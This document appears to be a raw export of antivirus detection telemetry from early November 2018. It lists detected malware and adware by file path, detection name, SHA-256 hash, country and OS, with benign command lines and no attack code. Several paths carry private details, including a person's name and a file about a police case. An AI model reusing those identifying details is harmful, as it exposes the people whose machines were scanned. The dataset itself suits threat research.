  Row(detection=Row(filename='avscan-20181102-060944-dcd627de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060944-DCD627DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060232-dbdd8643', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060232-DBDD8643', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055911-641199f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055911-641199F9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:44:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051413-1ba8a1fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051413-1BA8A1FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053812-7537cc7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053812-7537CC7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055000-1babfbc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055000-1BABFBC6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054438-5b5559fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054438-5B5559FA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9460b21dffab4232a8d840090f8bfc24ba2d248a', filepath='C:\\Users\\X\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\mq8y4a3o.default\\cache2\\entries\\9460B21DFFAB4232A8D840090F8BFC24BA2D248A', filesize=4000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='80a4a81e8caaa56f48d84c82c5269e4766ffca73901bfef6849da518df37fd8a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=445904, timestamp='2018-11-02T19:26:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054106-dd4b3019', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054106-DD4B3019', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='keygen.exe', filepath='D:\\civil\\مدني\\Progs\\ETABS 2015\\Keygen\\Keygen.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T21:17:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scmini.exe', filepath='\\\\?\\C:\\Program Files (x86)\\SmartCloudInput\\1.3.6.10910\\SCMiNi.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='4f5d72478c0ea865608bea5bc11b1c4fcacf7272a9921e2aa26027d362cd030c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:17:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-01-00-47-50.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-26T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-01T05:17:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='402793959738212.exe', filepath='\\\\?\\C:\\Temp\\402793959738212.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:18:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T11:12:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092339-d0bf76b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ce04639c\\AVSCAN-20181101-092029-AC75D7C4\\AVSCAN-20181101-092339-D0BF76B9', filesize=384000, name='HEUR/AGEN.1000013.#M1.#R1'), hash='06ce24b74bc7c51ab4939a136201ebb18c1edf3012939dab3e4af592218d5394', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:23:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155139-95e8bd26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155139-95E8BD26', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:30:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gprotection for autorun.exe', filepath='E:\\autorun.inf\\gProtection for Autorun.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181326-fb7b3a08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_76e5719a\\AVSCAN-20181101-181246-F6440152\\AVSCAN-20181101-181326-FB7B3A08', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='E:\\Bakup BLHD-DLH Perizinan 2017 (30 Okt 2018)\\APKL UMUM sd-2014\\MIH TANAH BUMBU\\SLDH&MIH 2014\\BIMTEK-MIH2014-bjm\\BLHD\\gvSIG\\petaOS\\MapSource\\Setup.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='39416db910e525c872133ee57c5260bbce8f2face1c2ce950d98311dfee7ef64', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T11:14:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='delnesec.exe', filepath='C:\\Temp\\DelNESEC.exe', filesize=896000, name='TR/Muldrop.phzie.#M1.#R1'), hash='18c3b3e51d6d955dba0de350125894462d0e2a9518358e9ee6d45e6ce8c419c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\A3000\\ExtInstall\\HEAT_uninstall.exe', parentsize=1947648, timestamp='2018-11-01T14:15:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (3).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (3).exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-01T23:46:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T19:25:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='training.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\new\\PLANNING TRAINING\\TRAINING.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T20:03:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155101-8f5a4a14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155101-8F5A4A14', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155312-a56eb1a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155312-A56EB1A6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='F:\\Backup\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe6_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:45:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='initwain.exe', filepath='C:\\Program Files (x86)\\Nuance\\PaperPort\\initwain.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='3d53931f1402e34996fee1c43dc6424521d912037ec0ac0c37f24647c4212cd2', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:cq+iK4ml30qBCagj.1', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T02:07:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:05:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:55:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='java-rmi.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Java\\jre6\\bin\\java-rmi.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='e6ed6dd1b872b308f336a56618d1b0abc4b26741b9c7e282eace09971fc023cd', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:35:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='racmgr32.exe', filepath='F:\\komputer adelina\\desktop\\VFPnew\\VFP\\RACMGR32.EXE', filesize=2368000, name='W32/Stanit.#M1.#R1'), hash='ab4520b51d238f7d8669fa3b496cdd18620bc8af65e576422b2fc364757d176c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-01T12:13:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104146-92360740', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_569ae788\\AVSCAN-20181101-102714-2CFE0F23\\AVSCAN-20181101-104146-92360740', filesize=2048000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='80dfbddd5388d86f949c93f0442541b686c50079c3b7f676ce1e4cb2ca848a30', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:41:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170128-68df2067', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bd561203\\AVSCAN-20181029-071119-BE26F8EF\\AVSCAN-20181101-170128-68DF2067', filesize=776000, name='PUA/SearchProtect.#M1.#R1'), hash='df6f18bce3dc95ea14da9545229330467cb5459ab63b05c1d994a48297905b4f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:01:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eb6b3866a857c6a18d3028dda018818690e0696c082f079e80de4c81343bbb55', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\EB6B3866A857C6A18D3028DDA018818690E0696C082F079E80DE4C81343BBB55', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='eb6b3866a857c6a18d3028dda018818690e0696c082f079e80de4c81343bbb55', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:33:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='default.exe', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\en-US\\Default\\Default.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wijdq.exe', filepath='C:\\ProgramData\\RoyaalCouponu\\WIJdq.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23816, timestamp='2018-11-01T22:10:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kh rút đặc tình ra khỏi chuyên án.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\KH RÚT ĐẶC TÌNH RA KHỎI CHUYÊN ÁN.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='eda9a788d05a6ab3b2c36dfe71e05eba5c35de687fd82229c9a7868c6367c5e7', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:29:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110005-a83192ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110005-A83192EA', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='listesi.scr', filepath='C:\\Users\\X\\ŞOFÖR LİSTESİ\\LİSTESİ.scr', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110923-eea78b38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110923-EEA78B38', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:09:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsa7C15.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T21:49:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123030-4259fc1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123008-2FAD091A\\AVSCAN-20181101-123030-4259FC1E', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:30:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='http.bat', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\advertisement\\http\\http.bat', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsr18AA.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8455960, timestamp='2018-11-01T12:16:53Z'), dt=datetime.date(2018, 11, 1)),
